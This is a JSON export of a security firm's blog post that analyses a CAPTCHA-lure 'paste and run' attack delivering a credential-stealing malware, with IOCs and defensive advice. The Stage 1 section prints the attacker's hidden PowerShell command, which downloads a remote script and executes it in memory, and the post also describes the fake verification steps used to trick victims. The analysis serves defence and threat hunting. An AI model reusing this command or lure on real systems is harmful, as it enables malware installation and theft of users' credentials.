{"id":921,"date":"2024-11-28T08:37:00","date_gmt":"2024-11-28T08:37:00","guid":{"rendered":"https:\/\/conscia.com\/ie\/?p=921"},"modified":"2025-09-23T08:51:19","modified_gmt":"2025-09-23T07:51:19","slug":"from-captcha-to-compromise-analysis-of-captchaclipper","status":"publish","type":"post","link":"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/","title":{"rendered":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper"},"content":{"rendered":"\n<p class=\" wp-block-paragraph\">Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">This attack, which we\u2019ve dubbed&nbsp;<strong>CAPTCHAclipper<\/strong>, exemplifies the convergence of social engineering and technical sophistication to compromise victims\u2019 systems and exfiltrate sensitive data.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">We observed the same TTPs in <strong>three distinct attacks<\/strong> over the course of one month, all within the European geographical region.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. The main payload is probably a variant of <a href=\"https:\/\/socradar.io\/malware-analysis-lummac2-stealer\/\"><strong>LummaC2 <\/strong>malware.<\/a><\/p>\n\n\n\n<p class=\" wp-block-paragraph\">When we first investigated the incident, the provided IOCs were not flagged as malicious, indicating the usage of novel TTPs. However, as of publishing this article, we can already see certain AV Engines recognizing at least some of the IOCs, but they can easily be altered and repurposed.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">Below, we discuss different stages of the attack chain.<\/p>\n\n\n\n<h2 class=\"wp-block-heading  wp-block-paragraph\">Analysis of Attack Chain<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Stage 1: The Malicious CAPTCHA Lure<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The attack began with a targeted lure: users were directed to a malicious, but legitimate-looking, website hosting a PDF file that the user was presented to download in a phishing lure. Before being able to download the file, the victim is presented with interactive CAPTCHA.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image1-1024x576.png\" alt=\"\" class=\"wp-image-4460\"\/><figcaption class=\"wp-element-caption\">Figure 1 \u2013 Legitimate-looking CAPTCHA is presented to victim<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">This initial step served a dual purpose:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>It established a layer of trust by mimicking legitimate verification methods.<\/li>\n\n\n\n<li>It initiated the first technical exploit via JavaScript, which we also recognize as \u2018<a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/clickfix-deception-a-social-engineering-tactic-to-deploy-malware\/\">ClickFix<\/a>\u2019 or \u2018paste and run\u2019 technique.<\/li>\n<\/ol>\n\n\n\n<p class=\" wp-block-paragraph\">When users engaged with the CAPTCHA to access a promised PDF file, a malicious JavaScript payload silently executed in the background.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">This script copied a PowerShell command to the system clipboard, preparing the ground for the next stage:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -WindowStyle Hidden -Command \u201c$rQd=\u2018https:\/\/s3-scw-tx.b-cdn&#91;.]net\/prizev2&#91;.]txt\u2019; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;\u201d<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image2.png\" alt=\"\" class=\"wp-image-4461\"\/><figcaption class=\"wp-element-caption\">Figure 2 \u2013 HTML code shows embedded JavaScript that copies malicious command to clipboard<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading  wp-block-paragraph\"><strong>Stage 2: Social Engineering with Malicious Instructions<\/strong><\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">After completing the CAPTCHA, victims received a notification for verification steps before being able to download the file. In order to download it, the victim had to follow the provided instructions, which were critical to the attack\u2019s success.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Press\u00a0<strong>Win+R <\/strong>to open the Run dialog.<\/li>\n\n\n\n<li>Press <strong>CTRL+V<\/strong> to paste the clipboard command (not knowingly).<\/li>\n\n\n\n<li>Press Enter.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image\" id=\"attachment_22615\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image3.png\" alt=\"Figure 3 - Victim is introduced with fake verification steps to lure them initiating the attack chain\" class=\"wp-image-22615\"\/><figcaption class=\"wp-element-caption\">Figure 3 \u2013 Victim is introduced with fake verification steps to lure them initiating the attack chain<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">This seemingly benign command was, in reality, a carefully engineered delivery mechanism. It:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Downloaded a malicious script: <code>prizev2.txt<\/code> from a remote server.<\/li>\n\n\n\n<li>Executed the script entirely in memory, bypassing file-based detections.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Stage 3: Deployment of Malicious Payload<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The downloaded script carried out multiple tasks to prepare for further exploitation:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Retrieved a ZIP file (prize.zip) from\u00a0<code>https:\/\/fixedzip.oss-ap-southeast-5.aliyuncs.com.<\/code><\/li>\n\n\n\n<li>Extracted the ZIP file contents into a randomly generated folder within the\u00a0APPDATA\u00a0directory.<\/li>\n\n\n\n<li>Launched the executable <code>setup.exe<\/code>, initiating the attack\u2019s next phase.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image\" id=\"attachment_22614\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image4.png\" alt=\"Figure 4 - the main payload is dropped as Setup.exe in APPDATA directory\" class=\"wp-image-22614\"\/><figcaption class=\"wp-element-caption\">Figure 4 \u2013 the main payload is dropped as Setup.exe in APPDATA directory<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">The use of the\u00a0<code>APPDATA<\/code>\u00a0directory ensured minimal visibility to routine security scans, emphasizing the actor\u2019s focus on evasion.<\/p>\n\n\n\n<h3 class=\"wp-block-heading  wp-block-paragraph\">Stage 4: Malicious Activities of Setup.exe<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The executable&nbsp;<code>Setup.exe<\/code>&nbsp;was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Credential Theft: <\/strong>Extracting login credentials stored in browser files (Login Data) for different browser at their typical file location.<\/li>\n\n\n\n<li><strong>Reconnaissance: <\/strong>Identifying installed antivirus and endpoint protection software to evade detection or disable defenses.<\/li>\n\n\n\n<li><strong>Command-and-Control (C2) Communication: <\/strong>Establishing an outbound connection to\u00a0<code>21.4.107:443<\/code>, linked to the domain\u00a0<code>sliperyedhby.icu<\/code>. This connection facilitated data exfiltration and allowed further commands from the attacker.<\/li>\n\n\n\n<li><strong>Persistence Mechanisms: <\/strong>Registering itself in the <code>Windows Task Scheduler<\/code> for automatic execution after system reboots. Creating an additional file (69HT8K.pif), potentially as a decoy or a secondary stage.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators of Compromise (IOCs)<\/h2>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td colspan=\"2\">File Artifacts<\/td><\/tr><tr><td><strong>File Name<\/strong><\/td><td><strong>SHA-256<\/strong><\/td><\/tr><tr><td>Setup.exe<\/td><td>d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb 8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b<\/td><\/tr><tr><td>Autolt3.exe<\/td><td>1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td colspan=\"2\">Networking Artifacts<\/td><\/tr><tr><td><strong>Domains:<\/strong><\/td><td>https:\/\/s3-scw-tx.b-cdn[.]net https:\/\/fixedzip.oss-ap-southeast-5.aliyuncs[.]com https:\/\/dirverif.oss-ap-southeast-5.aliyuncs[.]com\/checkpoint\/finished\/gnerous.txtsliperyedhby[.]icu<\/td><\/tr><tr><td><strong>IP Address:<\/strong><\/td><td>104.21.4.107<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Implications and Lessons Learned<\/h2>\n\n\n\n<p class=\" wp-block-paragraph\">The&nbsp;<strong>CAPTCHAclipper <\/strong>attack highlights a sophisticated, multi-layered approach to compromising systems:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>User Interaction as an Attack Vector: <\/strong>The reliance on user-driven actions (copy-pasting commands) exemplifies the effectiveness of social engineering.<\/li>\n\n\n\n<li><strong>Memory-Based Execution: <\/strong>Executing payloads in memory minimized detection by traditional antivirus solutions.<\/li>\n\n\n\n<li><strong>Persistence and Exfiltration: <\/strong>Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote control.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Effective defense strategies<\/h2>\n\n\n\n<p class=\" wp-block-paragraph\">The&nbsp;<strong>CaptchaClipper<\/strong>&nbsp;attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By leveraging social engineering and multi-stage infection techniques, attackers effectively bypass traditional defenses and exploit user trust.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach<strong>:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>User Awareness Training<\/strong>: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.<\/li>\n\n\n\n<li><strong>Enable Endpoint Detection and Response (EDR)<\/strong>: Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.<\/li>\n\n\n\n<li><a href=\"https:\/\/conscia.com\/service\/managed-services\/managed-security-services\/conscia-cyberdefense\/\"><strong>Employ continuous monitoring of security events<\/strong><\/a>: Deploying security solutions is not enough, if you do not have analysts looking over the potential incidents. The timeliness of detection is crucial in these types of attacks as most of the attack chain is automated.<\/li>\n\n\n\n<li><strong>Restrict PowerShell Usage<\/strong>: Limit PowerShell execution to signed scripts only, and monitor PowerShell activity closely.<\/li>\n\n\n\n<li><strong>Network Monitoring and Data Leak Detection<\/strong>: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.<\/li>\n\n\n\n<li><strong>Incident Response Planning<\/strong>: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.<\/li>\n<\/ol>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can:<\/strong><\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Enhance Threat Hunting<\/strong>: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Collaborate and Share Intelligence<\/strong>: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Report and Investigate<\/strong>: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses. The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":922,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"categories":[1],"global_solutions":[9,22],"global_partners":[],"global_industries":[25],"global_business_outcome":[43],"global_types":[],"class_list":["post-921","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","global_solutions-cybersecurity","global_solutions-threat-intelligence","global_industries-all-industries","global_business_outcome-security-operations"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v22.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia Ireland<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\" \/>\n<meta property=\"og:description\" content=\"Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses. The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\" \/>\n<meta property=\"og:site_name\" content=\"Conscia Ireland\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-28T08:37:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-23T07:51:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Mikkel Elvej\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mikkel Elvej\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\"},\"author\":{\"name\":\"Mikkel Elvej\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e\"},\"headline\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\",\"datePublished\":\"2024-11-28T08:37:00+00:00\",\"dateModified\":\"2025-09-23T07:51:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\"},\"wordCount\":1080,\"publisher\":{\"@id\":\"https:\/\/conscia.com\/ie\/#organization\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\",\"url\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\",\"name\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia Ireland\",\"isPartOf\":{\"@id\":\"https:\/\/conscia.com\/ie\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"datePublished\":\"2024-11-28T08:37:00+00:00\",\"dateModified\":\"2025-09-23T07:51:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\",\"url\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"contentUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/conscia.com\/ie\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/conscia.com\/ie\/#website\",\"url\":\"https:\/\/conscia.com\/ie\/\",\"name\":\"Conscia Ireland\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/conscia.com\/ie\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/conscia.com\/ie\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/conscia.com\/ie\/#organization\",\"name\":\"Conscia Ireland\",\"url\":\"https:\/\/conscia.com\/ie\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png\",\"contentUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png\",\"width\":994,\"height\":241,\"caption\":\"Conscia Ireland\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/conscia-ireland\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e\",\"name\":\"Mikkel Elvej\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g\",\"caption\":\"Mikkel Elvej\"},\"url\":\"https:\/\/conscia.com\/ie\/blog\/author\/mhe\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia Ireland","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/","og_locale":"en_US","og_type":"article","og_title":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper","og_description":"Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses. The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a [&hellip;]","og_url":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/","og_site_name":"Conscia Ireland","article_published_time":"2024-11-28T08:37:00+00:00","article_modified_time":"2025-09-23T07:51:19+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg","type":"image\/jpeg"}],"author":"Mikkel Elvej","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Mikkel Elvej","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#article","isPartOf":{"@id":"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/"},"author":{"name":"Mikkel Elvej","@id":"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e"},"headline":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper","datePublished":"2024-11-28T08:37:00+00:00","dateModified":"2025-09-23T07:51:19+00:00","mainEntityOfPage":{"@id":"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/"},"wordCount":1080,"publisher":{"@id":"https:\/\/conscia.com\/ie\/#organization"},"image":{"@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage"},"thumbnailUrl":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg","inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/","url":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/","name":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia Ireland","isPartOf":{"@id":"https:\/\/conscia.com\/ie\/#website"},"primaryImageOfPage":{"@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage"},"image":{"@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage"},"thumbnailUrl":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg","datePublished":"2024-11-28T08:37:00+00:00","dateModified":"2025-09-23T07:51:19+00:00","breadcrumb":{"@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage","url":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg","contentUrl":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/conscia.com\/ie\/"},{"@type":"ListItem","position":2,"name":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper"}]},{"@type":"WebSite","@id":"https:\/\/conscia.com\/ie\/#website","url":"https:\/\/conscia.com\/ie\/","name":"Conscia Ireland","description":"","publisher":{"@id":"https:\/\/conscia.com\/ie\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/conscia.com\/ie\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/conscia.com\/ie\/#organization","name":"Conscia Ireland","url":"https:\/\/conscia.com\/ie\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/","url":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png","contentUrl":"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png","width":994,"height":241,"caption":"Conscia Ireland"},"image":{"@id":"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/company\/conscia-ireland\/"]},{"@type":"Person","@id":"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e","name":"Mikkel Elvej","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/conscia.com\/ie\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g","caption":"Mikkel Elvej"},"url":"https:\/\/conscia.com\/ie\/blog\/author\/mhe\/"}]}},"_links":{"self":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/comments?post=921"}],"version-history":[{"count":2,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921\/revisions"}],"predecessor-version":[{"id":930,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921\/revisions\/930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/media\/922"}],"wp:attachment":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/media?parent=921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/categories?post=921"},{"taxonomy":"global_solutions","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_solutions?post=921"},{"taxonomy":"global_partners","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_partners?post=921"},{"taxonomy":"global_industries","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_industries?post=921"},{"taxonomy":"global_business_outcome","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_business_outcome?post=921"},{"taxonomy":"global_types","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_types?post=921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}